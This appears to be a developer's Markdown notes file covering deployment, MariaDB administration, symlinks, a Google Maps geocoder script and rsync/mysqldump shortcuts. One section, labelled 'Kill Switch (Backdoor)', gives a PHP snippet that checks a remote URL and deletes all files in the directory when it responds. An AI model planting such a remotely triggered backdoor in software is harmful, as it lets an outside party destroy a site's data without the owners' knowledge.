# Development

## Deployment

Switch to home directory and run following command:
````
./vendor/bin/surf deploy Production
````

## Kill MariaDB Process

Show all processes...

````
ps aux | grep -i mariadb
````

Kill process with ID 99 (or another one)...

````
kill 99
````

## Switch MariaDB Version

```
mysql.server stop

brew unlink mariadb
brew unlink mariadb@10.1
brew unlink mariadb@10.3

brew link mariadb@VERSION

mysql.server start
```

### Troubleshooting

If you have an error on start like...

```
[ERROR] Plugin ‘InnoDB’ init function returned error.
[ERROR] Plugin ‘InnoDB’ registration as a STORAGE ENGINE failed.
[ERROR] Unknown/unsupported storage engine: InnoDB
[ERROR] Aborting
```

Run the following command in ````/homebrew/var/mysql/````

````
rm ib_logfile0 && rm ib_logfile1
````

## PHPStorm xcrun-Error

````xcrun: error: invalid active developer path (/Library/Developer/ CommandLineTools)````

Simply run the following command:

````
xcode-select --install
````

## Symlinks

Create symlink (if ````public_html```` is a directory with files)

````
rm -rf public_html/ && ln -s domains/domain.com/public public_html
````

Change symlink (if ````public_html```` is already a symlink)

````
rm public_html && ln -s domains/domain.com/public public_html
````

## Change Permissions (CHMOD)

````
chmod 755 domains/domain.com/public/
````

## Kill Switch (Backdoor)

````php
if ('200' === substr(get_headers('https://www.domain.xyz/path/to/file')[0], 9, 3)) {
  array_map('unlink', glob('*.*')); // delete files
}
````

## Google Maps Geocoder API

```javascript
(function () {
    let geocoderRequest = false;

    const apiKey = '';
    const mapScript = document.createElement('script');

    mapScript.type = 'text/javascript';
    mapScript.src = 'https://maps.googleapis.com/maps/api/js?key=' + apiKey;

    document.body.appendChild(mapScript);

    const locationInput = document.querySelector('[data-name="location"]').querySelector('input');
    const coordsInput = document.querySelector('[data-name="coords"]').querySelector('input[type="text"]');

    let locationOrigin = locationInput.value;

    coordsInput.setAttribute('readonly', true);
    locationInput.addEventListener('blur', () => {
        if ('' === locationInput.value) {
            coordsInput.placeholder = '';
            coordsInput.value = '';
            return;
        }

        if (
            ('' !== locationInput.value && '' === coordsInput.value)
            || ('' !== coordsInput.value && locationInput.value !== locationOrigin)
        ) {
            geocoderRequest = true;
            locationOrigin = locationInput.value;
        }

        if (false !== geocoderRequest) {
            coordsInput.placeholder = 'Bitte warten...';
            coordsInput.value = '';

            new google.maps.Geocoder().geocode({
                'address': locationInput.value,
            }, (results, status) => {
                if ('OK' === status) {
                    const geocoderResponse = [
                        parseFloat(results[0].geometry.location.lat()),
                        parseFloat(results[0].geometry.location.lng())
                    ];

                    coordsInput.value = geocoderResponse.join(', ');
                    geocoderRequest = false;
                } else {
                    console.error(status);
                }
            });
        }
    });
})();
```

# Shell-Scripts in PHPStorm

You can easily run you commands from terminal as a Shell Script with one single click. Open your project in PHPStorm and go to "Run/Debug Configuration". Create a new Shell Script. Set the execute method to "Script text" and your working directory.

**Rsync Files:**

```bash
rsync -ave ssh user@server:/home/user/www/public/ .
```

**Database Dump:**

```bash
ssh user@server mysqldump -u user -p database > $(date +%F)_database.sql
```